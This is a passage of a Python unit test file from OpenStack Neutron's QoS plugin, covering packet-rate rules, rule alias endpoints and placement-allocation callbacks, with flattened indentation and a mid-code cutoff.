with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_packet_rate_limit_rules,
self.ctxt, self.policy.id)
def test_create_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_packet_rate_limit_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id, self.rule_data)
def test_delete_policy_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_packet_rate_limit_rule,
self.ctxt, self.pps_rule.id, self.policy.id)
def test_get_pps_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'max_kpps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_PACKET_RATE_LIMIT)
self.assertEqual(
qos_consts.RULE_TYPE_PACKET_RATE_LIMIT,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_pps_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_PACKET_RATE_LIMIT)
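# The two tests below check the bound/unbound split for minimum packet rate
# rules: creating one on a port already bound to a compute host (non-empty
# device_owner) is expected to raise NotImplementedError, while the same
# call on an unbound port must succeed.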
def test_create_min_pps_rule_on_bound_port(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='compute:fake-zone')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
self.assertRaises(
NotImplementedError,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, _policy.id, self.rule_data)
def test_create_min_pps_rule_on_unbound_port(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
try:
self.qos_plugin.create_policy_minimum_packet_rate_rule(
self.ctxt, _policy.id, self.rule_data)
except NotImplementedError:
self.fail("creating a minimum packet rate rule on an unbound "
"port should not raise NotImplementedError")
def test_create_policy_rule_check_rule_min_pps_direction_conflict(self):
_policy = self._get_policy()
self.rule_data['minimum_packet_rate_rule']['direction'] = 'any'
setattr(_policy, "rules", [self.min_pps_rule])
rules = [
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'ingress'
}
},
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'egress'
}
},
]
for new_rule_data in rules:
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
for rule_data in rules:
min_pps_rule = rule_object.QosMinimumPacketRateRule(
self.ctxt, **rule_data['minimum_packet_rate_rule'])
setattr(_policy, "rules", [min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
def test_create_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.create_policy_minimum_packet_rate_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_create_policy_min_pps_rule_duplicates(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
new_rule_data = {
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 1234,
'direction': self.min_pps_rule.direction,
},
}
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(
qos_exc.QoSRulesConflict,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_rule_check_rule_min_pps_direction_conflict(self):
_policy = self._get_policy()
rules_data = [
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'ingress'
}
},
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'egress'
}
},
]
self.rule_data['minimum_packet_rate_rule']['direction'] = 'any'
for rule_data in rules_data:
rules = [
rule_object.QosMinimumPacketRateRule(
self.ctxt, **rules_data[0]['minimum_packet_rate_rule']),
rule_object.QosMinimumPacketRateRule(
self.ctxt, **rules_data[1]['minimum_packet_rate_rule']),
]
setattr(_policy, 'rules', rules)
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, rule_data['minimum_packet_rate_rule']['id'],
self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
def test_update_policy_min_pps_rule_bad_policy(self):
_policy = self._get_policy()
setattr(_policy, "rules", [])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
def test_update_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
def test_delete_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.delete_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_min_pps_rule_bad_policy(self):
_policy = self._get_policy()
setattr(_policy, "rules", [])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, _policy.id)
def test_delete_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id)
def test_get_policy_min_pps_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id)
get_object_mock.assert_called_once_with(
self.ctxt, id=self.min_pps_rule.id)
def test_get_policy_min_pps_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_minimum_packet_rate_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_min_pps_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_minimum_packet_rate_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id)
def test_get_policy_min_pps_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_packet_rate_rules,
self.ctxt, self.policy.id)
def test_get_min_pps_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'min_kpps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE)
self.assertEqual(
qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_min_pps_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE)
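# Extension managers for the alias tests below: they expose the "alias"
# flavour of the QoS rule resources (e.g. alias-bandwidth-limit-rules) so a
# rule can be addressed directly by its own id instead of via its policy.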
class QoSRuleAliasTestExtensionManager(object):
def get_resources(self):
return qos_rules_alias.Qos_rules_alias.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
class QoSRuleAliasMinimumPacketRateTestExtensionManager(object):
def get_resources(self):
return qos_pps_minimum_rule_alias.Qos_pps_minimum_rule_alias.\
get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
class TestQoSRuleAlias(test_db_base_plugin_v2.NeutronDbPluginV2TestCase):
def setUp(self):
# Remove MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
plugin = 'ml2'
service_plugins = {'qos_plugin_name': SERVICE_PLUGIN_KLASS}
ext_mgr = QoSRuleAliasTestExtensionManager()
super(TestQoSRuleAlias, self).setUp(plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.rule_objects = {
'bandwidth_limit': rule_object.QosBandwidthLimitRule,
'dscp_marking': rule_object.QosDscpMarkingRule,
'minimum_bandwidth': rule_object.QosMinimumBandwidthRule
}
self.qos_policy_id = uuidutils.generate_uuid()
self.rule_data = {
'bandwidth_limit_rule': {'max_kbps': 100,
'max_burst_kbps': 150},
'dscp_marking_rule': {'dscp_mark': 16},
'minimum_bandwidth_rule': {'min_kbps': 10}
}
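# The alias resources are addressed as '<qos alias>/alias-<rule-type>-rules'.
# For a bandwidth_limit rule this builds, as a sketch (assuming qos.ALIAS is
# the 'qos' extension alias):
#   resource = 'qos/alias-bandwidth-limit-rules'
#   data = {'alias_bandwidth_limit_rule': {'max_kbps': 100, ...}}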
def _update_rule(self, rule_type, rule_id, **kwargs):
data = {'alias_%s_rule' % rule_type: kwargs}
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_update_request(resource, data, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
return self.deserialize(self.fmt, res)
def _show_rule(self, rule_type, rule_id):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_show_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
return self.deserialize(self.fmt, res)
def _delete_rule(self, rule_type, rule_id):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_delete_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
@mock.patch.object(qos_plugin.QoSPlugin, "update_policy_rule")
def test_update_rule(self, update_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch(
'neutron.objects.qos.rule.QosRule.get_object',
return_value=rule
), mock.patch.object(self.qos_plugin, 'get_policy_rule',
return_value=rule.to_dict()):
self._update_rule(rule_type, rule_id, **data)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id, {rule_data_name: data}))
update_policy_rule_mock.assert_has_calls(calls, any_order=True)
@mock.patch.object(qos_plugin.QoSPlugin, "get_policy_rule")
def test_show_rule(self, get_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch('neutron.objects.qos.rule.QosRule.get_object',
return_value=rule):
self._show_rule(rule_type, rule_id)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id))
get_policy_rule_mock.assert_has_calls(calls, any_order=True)
@mock.patch.object(qos_plugin.QoSPlugin, "delete_policy_rule")
def test_delete_rule(self, delete_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch(
'neutron.objects.qos.rule.QosRule.get_object',
return_value=rule
), mock.patch.object(self.qos_plugin, 'get_policy_rule',
return_value=rule.to_dict()):
self._delete_rule(rule_type, rule_id)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id))
delete_policy_rule_mock.assert_has_calls(calls, any_order=True)
def test_show_non_existing_rule(self):
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
with mock.patch('neutron.objects.qos.rule.QosRule.get_object',
return_value=None):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_show_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
self.assertEqual(webob.exc.HTTPNotFound.code, res.status_int)
class TestQoSRuleAliasMinimumPacketRate(TestQoSRuleAlias):
def setUp(self):
# Remove MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
plugin = 'ml2'
service_plugins = {'qos_plugin_name': SERVICE_PLUGIN_KLASS}
ext_mgr = QoSRuleAliasMinimumPacketRateTestExtensionManager()
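# Note: super(TestQoSRuleAlias, self) deliberately skips
# TestQoSRuleAlias.setUp() in the MRO so this subclass can install its own
# extension manager instead of the parent's.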
super(TestQoSRuleAlias, self).setUp(plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.rule_objects = {
'minimum_packet_rate': rule_object.QosMinimumPacketRateRule
}
self.qos_policy_id = uuidutils.generate_uuid()
self.rule_data = {
'minimum_packet_rate_rule': {'min_kpps': 10, 'direction': 'any'}
}
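# Unlike the mock-heavy tests above, TestQosPluginDB persists real versioned
# objects (policies, rules, ports, networks) in the test database and
# exercises the plugin callbacks and placement-allocation bookkeeping
# against them.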
class TestQosPluginDB(base.BaseQosTestCase):
PORT_ID = 'f02f160e-1612-11ec-b2b8-bf60ab98186c'
QOS_MIN_BW_RULE_ID = '8bf8eb46-160e-11ec-8024-9f96be32099d'
# MIN_BW_REQUEST_GROUP_UUID is the v5 UUID of the rule id in the port's
# namespace: uuid -v5 f02f160e-1612-11ec-b2b8-bf60ab98186c
#     8bf8eb46-160e-11ec-8024-9f96be32099d
MIN_BW_REQUEST_GROUP_UUID = 'c8bc1b27-59a1-5135-aa33-aeecad6093f4'
MIN_BW_RP = 'd7bea120-1626-11ec-9148-c32debfcf0f6'
QOS_MIN_PPS_RULE_ID = '6ac5db7e-1626-11ec-8c7f-0b70dbb8a8eb'
# MIN_PPS_REQUEST_GROUP_UUID is the v5 UUID of the rule id in the port's
# namespace: uuid -v5 f02f160e-1612-11ec-b2b8-bf60ab98186c
#     6ac5db7e-1626-11ec-8c7f-0b70dbb8a8eb
MIN_PPS_REQUEST_GROUP_UUID = '995008f4-f120-547a-b051-428b89076067'
MIN_PPS_RP = 'e16161f4-1626-11ec-a5a2-1fc9396e27cc'
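# A sketch of how the request-group UUIDs above can be reproduced in Python
# (assuming the uuid v5 convention the comments describe: namespace is the
# port id, name is the rule id):
#   import uuid
#   uuid.uuid5(uuid.UUID(PORT_ID), QOS_MIN_BW_RULE_ID)
#   # expected to equal MIN_BW_REQUEST_GROUP_UUID
#   uuid.uuid5(uuid.UUID(PORT_ID), QOS_MIN_PPS_RULE_ID)
#   # expected to equal MIN_PPS_REQUEST_GROUP_UUID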
def setUp(self):
super(TestQosPluginDB, self).setUp()
self.setup_coreplugin(load_plugins=False)
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins", ["qos"])
manager.init()
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.qos_plugin.driver_manager = mock.Mock()
self.rpc_push = mock.patch('neutron.api.rpc.handlers.resources_rpc'
'.ResourcesPushRpcApi.push').start()
self.context = context.get_admin_context()
self.project_id = uuidutils.generate_uuid()
def _make_qos_policy(self):
qos_policy = policy_object.QosPolicy(
self.context, project_id=self.project_id, shared=False,
is_default=False)
qos_policy.create()
return qos_policy
def _make_qos_minbw_rule(self, policy_id, direction='ingress',
min_kbps=1000, rule_id=None):
rule_id = rule_id if rule_id else uuidutils.generate_uuid()
qos_rule = rule_object.QosMinimumBandwidthRule(
self.context, project_id=self.project_id,
qos_policy_id=policy_id, direction=direction, min_kbps=min_kbps,
id=rule_id)
qos_rule.create()
return qos_rule
def _make_qos_minpps_rule(self, policy_id, direction='ingress',
min_kpps=1000, rule_id=None):
rule_id = rule_id if rule_id else uuidutils.generate_uuid()
qos_rule = rule_object.QosMinimumPacketRateRule(
self.context, project_id=self.project_id,
qos_policy_id=policy_id, direction=direction, min_kpps=min_kpps,
id=rule_id)
qos_rule.create()
return qos_rule
def _make_port(self, network_id, qos_policy_id=None, port_id=None,
qos_network_policy_id=None, device_owner=None):
port_id = port_id if port_id else uuidutils.generate_uuid()
base_mac = ['aa', 'bb', 'cc', 'dd', 'ee', 'ff']
mac = netaddr.EUI(next(net_utils.random_mac_generator(base_mac)))
device_owner = device_owner if device_owner else '3'
port = ports_object.Port(
self.context, network_id=network_id, device_owner=device_owner,
project_id=self.project_id, admin_state_up=True, status='DOWN',
device_id='2', qos_policy_id=qos_policy_id,
qos_network_policy_id=qos_network_policy_id, mac_address=mac,
id=port_id)
port.create()
return port
def _make_network(self, qos_policy_id=None):
network = network_object.Network(self.context,
qos_policy_id=qos_policy_id)
network.create()
return network
def _test_validate_create_network_callback(self, network_qos=False):
net_qos_obj = self._make_qos_policy()
net_qos_id = net_qos_obj.id if network_qos else None
network = self._make_network(qos_policy_id=net_qos_id)
kwargs = {"context": self.context,
"network": network}
with mock.patch.object(self.qos_plugin,
'validate_policy_for_network') \
as mock_validate_policy:
self.qos_plugin._validate_create_network_callback(
"NETWORK", "precommit_create", "test_plugin",
payload=events.DBEventPayload(
self.context, resource_id=kwargs['network']['id'],))
qos_policy = None
if network_qos:
qos_policy = net_qos_obj
if qos_policy:
mock_validate_policy.assert_called_once_with(
self.context, qos_policy, network.id)
else:
mock_validate_policy.assert_not_called()
def test_validate_create_network_callback(self):
self._test_validate_create_network_callback(network_qos=True)
def test_validate_create_network_callback_no_qos(self):
self._test_validate_create_network_callback(network_qos=False)
def _test_validate_create_port_callback(self, port_qos=False,
network_qos=False):
net_qos_obj = self._make_qos_policy()
port_qos_obj = self._make_qos_policy()
net_qos_id = net_qos_obj.id if network_qos else None
port_qos_id = port_qos_obj.id if port_qos else None
network = self._make_network(qos_policy_id=net_qos_id)
port = self._make_port(network.id, qos_policy_id=port_qos_id)
kwargs = {"context": self.context,
"port": {"id": port.id}}
with mock.patch.object(self.qos_plugin, 'validate_policy_for_port') \
as mock_validate_policy:
self.qos_plugin._validate_create_port_callback(
"PORT", "precommit_create", "test_plugin",
payload=events.DBEventPayload(
self.context,
resource_id=kwargs['port']['id'],))
qos_policy = None
if port_qos:
qos_policy = port_qos_obj
elif network_qos:
qos_policy = net_qos_obj
if qos_policy:
mock_validate_policy.assert_called_once_with(
self.context, qos_policy, port)
else:
mock_validate_policy.assert_not_called()
def test_validate_create_port_callback_policy_on_port(self):
self._test_validate_create_port_callback(port_qos=True)
def test_validate_create_port_callback_policy_on_port_and_network(self):
self._test_validate_create_port_callback(port_qos=True,
network_qos=True)
def test_validate_create_port_callback_policy_on_network(self):
self._test_validate_create_port_callback(network_qos=True)
def test_validate_create_port_callback_no_policy(self):
self._test_validate_create_port_callback()
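# Helper that fabricates the (original_port, port) state pair a
# before_update payload would carry: 'original_port' holds the old QoS ids
# (including any network-level policy), 'port' only the fields being
# updated.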
def _prepare_for_port_placement_allocation_change(self, qos1, qos2,
qos_network_policy=None):
qos1_id = qos1.id if qos1 else None
qos2_id = qos2.id if qos2 else None
qos_network_policy_id = (
qos_network_policy.id if qos_network_policy else None)
network = self._make_network(qos_policy_id=qos_network_policy_id)
port = self._make_port(
network.id, qos_policy_id=qos1_id, port_id=TestQosPluginDB.PORT_ID)
return {"context": self.context,
"original_port": {
"id": port.id,
"device_owner": "compute:uu:id",
"qos_policy_id": qos1_id,
"qos_network_policy_id": qos_network_policy_id},
"port": {"id": port.id, "qos_policy_id": qos2_id}}
def test_check_port_for_placement_allocation_change_no_qos_change(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=qos1_obj)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_not_called()
def test_check_port_for_placement_allocation_change(self):
qos1_obj = self._make_qos_policy()
qos2_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=qos2_obj)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos1_obj, qos2_obj, kwargs['original_port'], port)
def test_check_port_for_placement_allocation_change_no_new_policy(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=None)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos1_obj, None, kwargs['original_port'], port)
def test_check_port_for_placement_allocation_change_no_qos_update(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=None)
kwargs['port'].pop('qos_policy_id')
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_not_called()
def test_check_port_for_placement_allocation_change_qos_network_policy(
self):
qos_network = self._make_qos_policy()
desired_qos = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=None, qos2=desired_qos, qos_network_policy=qos_network)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos_network, desired_qos, kwargs['original_port'], port)
def test_check_network_for_placement_allocation_change_no_qos_change(self):
qos1 = self._make_qos_policy()
original_network = self._make_network(qos1.id)
network = original_network
ml2plugin_mock = mock.MagicMock()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
mock_alloc_change.assert_not_called()
ml2plugin_mock._make_port_dict.assert_not_called()
def test_check_network_for_placement_allocation_change_no_ports_to_update(
self):
original_qos = self._make_qos_policy()
qos = self._make_qos_policy()
port_qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network(qos.id)
# Port which is not compute bound
self._make_port(network_id=network.id, qos_policy_id=None,
device_owner='uu:id')
# Port with overwritten QoS policy
self._make_port(network_id=network.id, qos_policy_id=port_qos.id,
device_owner='compute:uu:id')
ml2plugin_mock = mock.MagicMock()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
mock_alloc_change.assert_not_called()
ml2plugin_mock._make_port_dict.assert_not_called()
def test_check_network_for_placement_allocation_change_remove_qos(self):
original_qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network()
ml2plugin_mock = mock.MagicMock()
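# Stand-in for ML2's _make_port_dict(): reduces the port object to just the
# fields _check_network_for_placement_allocation_change consumes.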
def fake_make_port_dict(port):
return {
'id': port.id,
'device_owner': port.device_owner,
'qos_policy_id': port.qos_policy_id,
'qos_network_policy_id': port.qos_network_policy_id,
}
ml2plugin_mock._make_port_dict.side_effect = fake_make_port_dict
port1 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port1_binding = ports_object.PortBinding(
